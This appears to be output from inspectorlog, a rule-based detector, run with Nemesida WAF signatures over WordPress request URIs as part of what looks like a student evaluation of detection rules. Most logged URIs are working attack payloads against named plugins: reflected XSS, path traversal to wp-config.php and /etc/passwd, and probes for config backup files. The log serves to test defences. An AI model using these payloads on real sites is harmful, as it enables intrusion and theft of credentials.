# inspectorlog v3.5
#----- Initializing Rules (NEMESIDA)  ---------------------
#	Opening NEMESIDA rule file /home/kali/Downloads/reglas_javi/nemesida/nemesida-rules-bin-20220109.txt...
#		Rules: read [506], erroneous [0], URI (URL|ARGS) [449]
#-----  Statistics (NEMESIDA) ------------------------------
# Read [506] nemesida rules, [449] http-related, [0] with errors
#----- Analysis results ----------------------------
# Alerts & signatures generated from: /home/kali/Downloads/inspectorlog/inspectorlog -l wordpress.uri -m /home/kali/Downloads/reglas_javi/nemesida/nemesida-rules-bin-20220109.txt -t list -o /home/kali/TFG/inspectorlog/nemesida/web_dinamica/owasp/opensource/nuclei/wordpress.clean
Packet [2]	Uri [/web/wp-content/plugins/flash-album-gallery/facebook.php?i=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [3]	Uri [/web/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E]	Nattacks [5]	Signatures	[300000052]	[300000508]	[300000515]	[300000537]	[300000550]
Packet [4]	Uri [/web/wp-content/plugins/brandfolder/callback.php?wp_abspath=../../../wp-config.php%00]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]
Packet [6]	Uri [/web/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [8]	Uri [/web/wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [12]	Uri [/web/wp-admin/admin.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E/?page=under-construction]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [13]	Uri [/web/wp-content/themes/prostore/go.php?https://example.com/]	Nattacks [1]	Signatures	[300001136]
Packet [14]	Uri [/web/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [15]	Uri [/web/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [17]	Uri [/web/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&]	Nattacks [5]	Signatures	[300000052]	[300000508]	[300000515]	[300000537]	[300000550]
Packet [18]	Uri [/web/wp-content/plugins/e-search/tmpl/date_select.php?date-from=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [19]	Uri [/web/wp-admin/admin-post.php?alg_wc_pif_download_file=../../../../../wp-config.php]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [20]	Uri [/web/?page_id=0&&errors[fu-disallowed-mime-type][0][name]=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [21]	Uri [/web/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3C%22]	Nattacks [5]	Signatures	[300000051]	[300000508]	[300000515]	[300000537]	[300000550]
Packet [24]	Uri [/web/wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [25]	Uri [/web/wp-content/plugins/hdw-tube/mychannel.php?channel=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [26]	Uri [/web/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E]	Nattacks [5]	Signatures	[300000052]	[300000508]	[300000515]	[300000537]	[300000550]
Packet [27]	Uri [/web/wp-content/plugins/photoxhibit/common/inc/pages/build.php?gid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [29]	Uri [/web/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd]	Nattacks [2]	Signatures	[300001559]	[300002734]
Packet [30]	Uri [/web/wp-content/plugins/securimage-wp/siwp_test.php/%22/%3E%3Cscript%3Ealert(1);%3C/script%3E?tested=1]	Nattacks [4]	Signatures	[300000051]	[300000508]	[300000515]	[300000537]
Packet [32]	Uri [/web/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php?itemid=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [33]	Uri [/web/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [34]	Uri [/web/wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php?file=../../../wp-config.php]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [35]	Uri [/web/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [36]	Uri [/web/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [38]	Uri [/web/wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [40]	Uri [/web/wp-content/plugins/admin-font-editor/css.php?size=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [41]	Uri [/web/wp-content/themes/prostore/go.php?https://example.com/]	Nattacks [1]	Signatures	[300001136]
Packet [42]	Uri [/web/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [43]	Uri [/web/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [44]	Uri [/web/wp-content/plugins/e-search/tmpl/date_select.php?date-from=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [45]	Uri [/web/wp-admin/admin-post.php?alg_wc_pif_download_file=../../../../../wp-config.php]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [46]	Uri [/web/?page_id=0&&errors[fu-disallowed-mime-type][0][name]=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [47]	Uri [/web/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3C%22]	Nattacks [5]	Signatures	[300000051]	[300000508]	[300000515]	[300000537]	[300000550]
Packet [50]	Uri [/web/wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [51]	Uri [/web/wp-content/plugins/hdw-tube/mychannel.php?channel=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [52]	Uri [/web/wp-content/plugins/photoxhibit/common/inc/pages/build.php?gid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [54]	Uri [/web/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd]	Nattacks [2]	Signatures	[300001559]	[300002734]
Packet [55]	Uri [/web/wp-content/plugins/securimage-wp/siwp_test.php/%22/%3E%3Cscript%3Ealert(1);%3C/script%3E?tested=1]	Nattacks [4]	Signatures	[300000051]	[300000508]	[300000515]	[300000537]
Packet [57]	Uri [/web/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php?itemid=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [58]	Uri [/web/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [59]	Uri [/web/wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php?file=../../../wp-config.php]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [60]	Uri [/web/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [61]	Uri [/web/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [63]	Uri [/web/wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [65]	Uri [/web/?action=dzsap_download&link=../../../../../../../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [66]	Uri [/web/wp-content/plugins/admin-font-editor/css.php?size=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [67]	Uri [/web/wp-config.php-backup]	Nattacks [1]	Signatures	[300001512]
Packet [68]	Uri [/web/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3C%2FsCripT%3E%3CsCripT%3Ealert%28document.domain%29%3C%2FsCripT%3E]	Nattacks [3]	Signatures	[300000053]	[300000508]	[300000550]
Packet [71]	Uri [/web/wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [5]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]	[300002841]
Packet [74]	Uri [/web/wp-content/plugins/hero-maps-pro/views/dashboard/index.php?v=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [77]	Uri [/web/wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&]	Nattacks [5]	Signatures	[300000052]	[300000508]	[300000515]	[300000537]	[300000550]
Packet [79]	Uri [/web/wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd]	Nattacks [2]	Signatures	[300001559]	[300002734]
Packet [83]	Uri [/web/.wp-config.php.swp]	Nattacks [2]	Signatures	[300001512]	[300001518]
Packet [84]	Uri [/web/?action=dzsap_download&link=../../../../../../../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [85]	Uri [/web/wp-config.php-backup]	Nattacks [1]	Signatures	[300001512]
Packet [86]	Uri [/web/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3C%2FsCripT%3E%3CsCripT%3Ealert%28document.domain%29%3C%2FsCripT%3E]	Nattacks [3]	Signatures	[300000053]	[300000508]	[300000550]
Packet [89]	Uri [/web/wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [5]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]	[300002841]
Packet [92]	Uri [/web/wp-content/plugins/hero-maps-pro/views/dashboard/index.php?v=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [96]	Uri [/web/wp-config.inc]	Nattacks [2]	Signatures	[300001517]	[300002829]
Packet [100]	Uri [/web/wp-config.old]	Nattacks [1]	Signatures	[300001518]
Packet [104]	Uri [/web/wp-config.php.txt]	Nattacks [1]	Signatures	[300001512]
Packet [105]	Uri [/web/wp-config.php.bak]	Nattacks [2]	Signatures	[300001512]	[300001927]
Packet [106]	Uri [/web/wp-config.php.old]	Nattacks [2]	Signatures	[300001512]	[300001518]
Packet [107]	Uri [/web/wp-config.php.dist]	Nattacks [1]	Signatures	[300001512]
Packet [108]	Uri [/web/wp-config.php.inc]	Nattacks [2]	Signatures	[300001512]	[300001517]
Packet [109]	Uri [/web/wp-config.php.swp]	Nattacks [2]	Signatures	[300001512]	[300001518]
Packet [110]	Uri [/web/wp-config.php.html]	Nattacks [1]	Signatures	[300001512]
Packet [112]	Uri [/web/wp-config.php.save]	Nattacks [2]	Signatures	[300001512]	[300001518]
Packet [113]	Uri [/web/wp-config.php~]	Nattacks [2]	Signatures	[300001500]	[300001512]
Packet [114]	Uri [/web/wp-config.php-backup]	Nattacks [1]	Signatures	[300001512]
Packet [115]	Uri [/web/wp-config.php.orig]	Nattacks [2]	Signatures	[300001512]	[300001518]
Packet [116]	Uri [/web/wp-config.php.original]	Nattacks [1]	Signatures	[300001512]
# N. packets [117], [73] with alerts, N. Alerts [238]
# Execution time: 0.046217 s
